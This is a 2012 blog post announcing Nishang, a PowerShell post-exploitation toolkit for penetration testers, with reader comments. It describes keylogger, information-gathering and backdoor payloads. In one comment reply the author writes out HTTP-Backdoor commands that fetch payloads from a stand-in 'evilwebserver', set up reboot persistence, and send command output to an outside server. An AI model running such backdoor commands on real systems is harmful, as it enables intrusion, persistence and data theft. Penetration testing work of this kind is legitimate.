Tuesday, August 14, 2012

(Introducing) Nishang : PowerShell for Penetration Testing

I have been using PowerShell in penetration tests for some time now. It is a really powerful shell and scripting language which gives you access to interesting things on a Windows machine. There are many PowerShell scripts involved in Kautilya. In fact, these PowerShell scripts are the reason behind power of Windows payloads in Kautilya.

At some of my talks many nice folks have asked me about the availability of PowerShell scripts for use in Penetration Tests. I started writing new scripts and collecting older ones. After working on this for a while I had some useful collection of payloads and scripts. I call it Nishang. It is available on google code here http://code.google.com/p/nishang/

Nishang means quiver (container for arrows) in Sanskrit. Apt for a collection of payloads and scripts.

It is a collection of scripts and post exploitation framework in PowerShell. The aim is to increase the usage of PowerShell in offensive security and penetration test. Nishang is a result of my own requirements during real life pen tests. Since it is a post exploitation thingy it is assumed that you have a shell access on the machine or using a HID like Teensy to drop the script on the victim.

Why PowerShell? It is easy to learn and powerful (think of Bash in Unix ported to Windows) and is present on every modern Windows macine. If you use PowerShell "properly", most of the times you would need practically nothing for post exploitation other than powershell.

Currently, Nishang includes only those payloads and scripts which do not require you to be an administrator on the machine. That is, no priv shell is required. The payloads are of varied complexity (for the user), while there are simpler ones like Download, Keylogger and Information Gatherer to complex ones like DNS_TXT_Pwnage and Wait_For_Command. All the payloads and scripts come with help. Use

PS> Get-Help [payloadname.ps1] -full

for help on executing a script or payload.

How to use it? The scripts can be used either if you have access to powershell prompt (when you have vnc or rdp etc) or if you have a windows command shell on the target. You must download the script on the target machine.

Below screenshots shows a quick example of the Information_Gather payload being downloaded and executed on a target machine.

One liner to download a script on the target


Execute the script. Note the parameters being passed ot the script.

The result of this payload (info uploaded to pastebin)

That was easy. All the scripts could be executed this way. Yay!

A word of caution, it may appear that your session has stuck after you execute the script. But you can eventually make your way out by repeatedly pressing enter. I am unaware of the reason behind this.

What's next? More scripts are in the development pipeline. Many of them require privileged shell on the target. Also, Niklas Goude has allowed me to add his powershell scripts to Nishang. They should be available with next release, thanks Niklas !

Also, the scripts are Tab ugly right now, that would be clean in next release.

I am looking forward for feedbacks, contributions and feature requests. I hope this would be useful.

10 comments:

  1. my friend i love your work and i see all your post you are great and thank you

    ReplyDelete
  2. Awesome work. I really appreciate. Thanks for sharing. Keep it up.

    Penetration Testing

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Hi,
    when importing the nishang.psm1 i get this:
    WARNUNG: Die Namen einiger importierter Befehle auf Modul "nishang" enthalten nicht genehmigte Verben, sodass deren Auf
    findbarkeit erschwert werden kann. Wenn Sie die Befehle mit nicht genehmigten Verben finden möchten, führen Sie den Imp
    ort-Module-Befehl erneut mit dem Verbose-Parameter aus. Sie können durch Eingeben von "Get-Verb" eine Liste der genehmi
    gten Verben anzeigen.
    WARNUNG: Einige importierte Befehlsnamen enthalten mindestens eines der folgenden eingeschränkten Zeichen: # , ( ) {{ }
    } [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~

    any idea how to solve it?

    ReplyDelete
    Replies
    1. You would be able to use Nishang without any problem. That is just a warning, which is shown because function names in Nishang do not strictly follow the Verb-Noun naming convention. I am aware of this and do not change the names for convinience of old users.

      Delete
  5. Hi Nikhil,
    congratulations for your work. I use, as Harmj0y as long as i know, a new Cobalt Strike feature that allows the use of powershell scripts in a very interesting way. Unfortunately trying your http-backdoor script nothing seems to happen. (just fall-down)
    Did you already try to do such a thing?
    Have you already meet this kind of problem.
    If all goes well, can you give us the exact order to obtain a persistence on a remote system.
    Thank you and read you soon.

    ReplyDelete
    Replies
    1. Hi,

      I have read about this new thing in Cobal Strike but have not tested it yet. You must make a call to the HTTP-Backdoor function after executing the script. You could do this in two ways:

      1. Execute script;Call the function by name and parameters
      . C:\script\HTTP-Backdoor.ps1;HTTP-Backdoor -CheckURL http://yourwebserver -PayloadURL http://evilwebserver -MagicString start123 -StopString stopbackdoor -persist

      2. If you could not pass semi-colon spearated commands to Cobal Strike, make the function call in the script itself.
      HTTP-Backdoor -CheckURL http://yourwebserver -PayloadURL http://evilwebserver -MagicString start123 -StopString stopbackdoor -persist

      The persist option will make use of available privileges and would use WMI permanent event consumers or Registry keys according to the available privileges for reboot persistence.

      If you want to see the results of your commands and scripts you send to the backdoor, use the -exfil option as well
      HTTP-Backdoor -CheckURL http://yourwebserver -PayloadURL http://evilwebserver -MagicString start123 -StopString stopbackdoor -exfil -ExfilOption WebServer http://resultwebserver -persist

      Hope this helps. Let me know.

      Delete
    2. Thanks for your response Nikhil, i followed your recommandations. With no success unfortunately.
      I've send a mail to Raph and waiting for his answer.
      I really hope also that you could try yourself this way to handle nishang via cobalt strike. (21 days of trial is available).
      for other of your scripts, everything goes well.
      thanks for all, and congrats again for your great works.

      Delete
    3. Please drop me a mail on nikhil[dot]uitrgpv[at]gmail[dot]com. So that I could mail you back when I test this. Thanks for trying Nishang.

      Delete